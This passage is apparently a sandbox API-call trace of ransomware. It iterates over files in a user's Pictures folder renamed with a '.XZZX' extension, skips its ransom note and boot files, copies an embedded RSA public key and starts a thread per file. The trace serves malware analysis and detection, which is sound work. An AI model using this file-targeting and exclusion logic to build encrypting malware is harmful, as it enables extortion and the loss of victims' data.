MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0249.481] lstrcpyW (in: lpString1=0x17cf1c, lpString2="7EC795ED37AF1A88A52703F73BCFFED0.XZZX" | out: lpString1="7EC795ED37AF1A88A52703F73BCFFED0.XZZX") returned="7EC795ED37AF1A88A52703F73BCFFED0.XZZX" [0249.481] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0249.481] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1388 [0249.481] Sleep (dwMilliseconds=0x96) [0249.637] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0249.637] lstrcmpW (lpString1="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX", lpString2="..") returned 1 [0249.637] lstrcmpW (lpString1="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX", lpString2=".") returned 1 [0249.637] StrStrW (lpFirst="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0249.637] StrStrW (lpFirst="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX", lpSrch="ntldr") returned 0x0 [0249.637] StrStrW (lpFirst="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX", lpSrch="NTLDR") returned 0x0 [0249.637] StrStrW (lpFirst="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0249.637] StrStrW (lpFirst="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0249.637] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0249.637] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0249.637] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0249.637] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0249.637] lstrcpyW (in: lpString1=0x17cf1c, lpString2="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX" | out: lpString1="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX") returned="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX" [0249.637] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0249.637] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x138c [0249.637] Sleep (dwMilliseconds=0x96) [0249.792] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0249.792] lstrcmpW (lpString1="8F82071C3E6AA36071D28504428B87A8.XZZX", lpString2="..") returned 1 [0249.792] lstrcmpW (lpString1="8F82071C3E6AA36071D28504428B87A8.XZZX", lpString2=".") returned 1 [0249.792] StrStrW (lpFirst="8F82071C3E6AA36071D28504428B87A8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0249.793] StrStrW (lpFirst="8F82071C3E6AA36071D28504428B87A8.XZZX", lpSrch="ntldr") returned 0x0 [0249.793] StrStrW (lpFirst="8F82071C3E6AA36071D28504428B87A8.XZZX", lpSrch="NTLDR") returned 0x0 [0249.793] StrStrW (lpFirst="8F82071C3E6AA36071D28504428B87A8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0249.793] StrStrW (lpFirst="8F82071C3E6AA36071D28504428B87A8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0249.793] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0249.793] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0249.793] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0249.793] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0249.793] lstrcpyW (in: lpString1=0x17cf1c, lpString2="8F82071C3E6AA36071D28504428B87A8.XZZX" | out: lpString1="8F82071C3E6AA36071D28504428B87A8.XZZX") returned="8F82071C3E6AA36071D28504428B87A8.XZZX" [0249.793] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0249.793] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1390 [0249.793] Sleep (dwMilliseconds=0x96) [0249.948] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0249.948] lstrcmpW (lpString1="8FACB48C4470F6BE344BE4A448A5DB06.XZZX", lpString2="..") returned 1 [0249.949] lstrcmpW (lpString1="8FACB48C4470F6BE344BE4A448A5DB06.XZZX", lpString2=".") returned 1 [0249.949] StrStrW (lpFirst="8FACB48C4470F6BE344BE4A448A5DB06.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0249.949] StrStrW (lpFirst="8FACB48C4470F6BE344BE4A448A5DB06.XZZX", lpSrch="ntldr") returned 0x0 [0249.949] StrStrW (lpFirst="8FACB48C4470F6BE344BE4A448A5DB06.XZZX", lpSrch="NTLDR") returned 0x0 [0249.949] StrStrW (lpFirst="8FACB48C4470F6BE344BE4A448A5DB06.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0249.949] StrStrW (lpFirst="8FACB48C4470F6BE344BE4A448A5DB06.XZZX", lpSrch="ntdetect.com") returned 0x0 [0249.949] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0249.949] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0249.949] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0249.949] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0249.949] lstrcpyW (in: lpString1=0x17cf1c, lpString2="8FACB48C4470F6BE344BE4A448A5DB06.XZZX" | out: lpString1="8FACB48C4470F6BE344BE4A448A5DB06.XZZX") returned="8FACB48C4470F6BE344BE4A448A5DB06.XZZX" [0249.949] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0249.949] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1394 [0249.949] Sleep (dwMilliseconds=0x96) [0250.104] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0250.104] lstrcmpW (lpString1="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX", lpString2="..") returned 1 [0250.104] lstrcmpW (lpString1="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX", lpString2=".") returned 1 [0250.105] StrStrW (lpFirst="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0250.105] StrStrW (lpFirst="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX", lpSrch="ntldr") returned 0x0 [0250.105] StrStrW (lpFirst="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX", lpSrch="NTLDR") returned 0x0 [0250.105] StrStrW (lpFirst="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0250.105] StrStrW (lpFirst="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX", lpSrch="ntdetect.com") returned 0x0 [0250.105] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0250.105] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0250.105] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0250.105] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0250.105] lstrcpyW (in: lpString1=0x17cf1c, lpString2="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX" | out: lpString1="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX") returned="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX" [0250.105] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0250.105] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1398 [0250.105] Sleep (dwMilliseconds=0x96) [0250.261] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0250.261] lstrcmpW (lpString1="A74BC39B153F2E46BB66A40D1960128E.XZZX", lpString2="..") returned 1 [0250.261] lstrcmpW (lpString1="A74BC39B153F2E46BB66A40D1960128E.XZZX", lpString2=".") returned 1 [0250.261] StrStrW (lpFirst="A74BC39B153F2E46BB66A40D1960128E.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0250.261] StrStrW (lpFirst="A74BC39B153F2E46BB66A40D1960128E.XZZX", lpSrch="ntldr") returned 0x0 [0250.261] StrStrW (lpFirst="A74BC39B153F2E46BB66A40D1960128E.XZZX", lpSrch="NTLDR") returned 0x0 [0250.261] StrStrW (lpFirst="A74BC39B153F2E46BB66A40D1960128E.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0250.261] StrStrW (lpFirst="A74BC39B153F2E46BB66A40D1960128E.XZZX", lpSrch="ntdetect.com") returned 0x0 [0250.261] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0250.261] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0250.261] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0250.261] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0250.261] lstrcpyW (in: lpString1=0x17cf1c, lpString2="A74BC39B153F2E46BB66A40D1960128E.XZZX" | out: lpString1="A74BC39B153F2E46BB66A40D1960128E.XZZX") returned="A74BC39B153F2E46BB66A40D1960128E.XZZX" [0250.261] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0250.261] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x139c [0250.261] Sleep (dwMilliseconds=0x96) [0250.416] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0250.416] lstrcmpW (lpString1="BD094FF047045CCAB6A2A1584B394112.XZZX", lpString2="..") returned 1 [0250.416] lstrcmpW (lpString1="BD094FF047045CCAB6A2A1584B394112.XZZX", lpString2=".") returned 1 [0250.417] StrStrW (lpFirst="BD094FF047045CCAB6A2A1584B394112.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0250.417] StrStrW (lpFirst="BD094FF047045CCAB6A2A1584B394112.XZZX", lpSrch="ntldr") returned 0x0 [0250.417] StrStrW (lpFirst="BD094FF047045CCAB6A2A1584B394112.XZZX", lpSrch="NTLDR") returned 0x0 [0250.417] StrStrW (lpFirst="BD094FF047045CCAB6A2A1584B394112.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0250.417] StrStrW (lpFirst="BD094FF047045CCAB6A2A1584B394112.XZZX", lpSrch="ntdetect.com") returned 0x0 [0250.417] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0250.417] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0250.417] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0250.417] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0250.417] lstrcpyW (in: lpString1=0x17cf1c, lpString2="BD094FF047045CCAB6A2A1584B394112.XZZX" | out: lpString1="BD094FF047045CCAB6A2A1584B394112.XZZX") returned="BD094FF047045CCAB6A2A1584B394112.XZZX" [0250.417] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0250.417] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13a0 [0250.417] Sleep (dwMilliseconds=0x96) [0250.573] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0250.573] lstrcmpW (lpString1="C22D6D6701D063BFF430045506304807.XZZX", lpString2="..") returned 1 [0250.573] lstrcmpW (lpString1="C22D6D6701D063BFF430045506304807.XZZX", lpString2=".") returned 1 [0250.573] StrStrW (lpFirst="C22D6D6701D063BFF430045506304807.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0250.573] StrStrW (lpFirst="C22D6D6701D063BFF430045506304807.XZZX", lpSrch="ntldr") returned 0x0 [0250.573] StrStrW (lpFirst="C22D6D6701D063BFF430045506304807.XZZX", lpSrch="NTLDR") returned 0x0 [0250.573] StrStrW (lpFirst="C22D6D6701D063BFF430045506304807.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0250.573] StrStrW (lpFirst="C22D6D6701D063BFF430045506304807.XZZX", lpSrch="ntdetect.com") returned 0x0 [0250.573] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0250.573] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0250.573] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0250.573] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0250.573] lstrcpyW (in: lpString1=0x17cf1c, lpString2="C22D6D6701D063BFF430045506304807.XZZX" | out: lpString1="C22D6D6701D063BFF430045506304807.XZZX") returned="C22D6D6701D063BFF430045506304807.XZZX" [0250.573] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0250.573] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13a4 [0250.574] Sleep (dwMilliseconds=0x96) [0250.729] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0250.729] lstrcmpW (lpString1="C30CF4F82E58715357484B18328D559B.XZZX", lpString2="..") returned 1 [0250.729] lstrcmpW (lpString1="C30CF4F82E58715357484B18328D559B.XZZX", lpString2=".") returned 1 [0250.729] StrStrW (lpFirst="C30CF4F82E58715357484B18328D559B.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0250.729] StrStrW (lpFirst="C30CF4F82E58715357484B18328D559B.XZZX", lpSrch="ntldr") returned 0x0 [0250.729] StrStrW (lpFirst="C30CF4F82E58715357484B18328D559B.XZZX", lpSrch="NTLDR") returned 0x0 [0250.729] StrStrW (lpFirst="C30CF4F82E58715357484B18328D559B.XZZX", lpSrch="NTDETECT.COM") 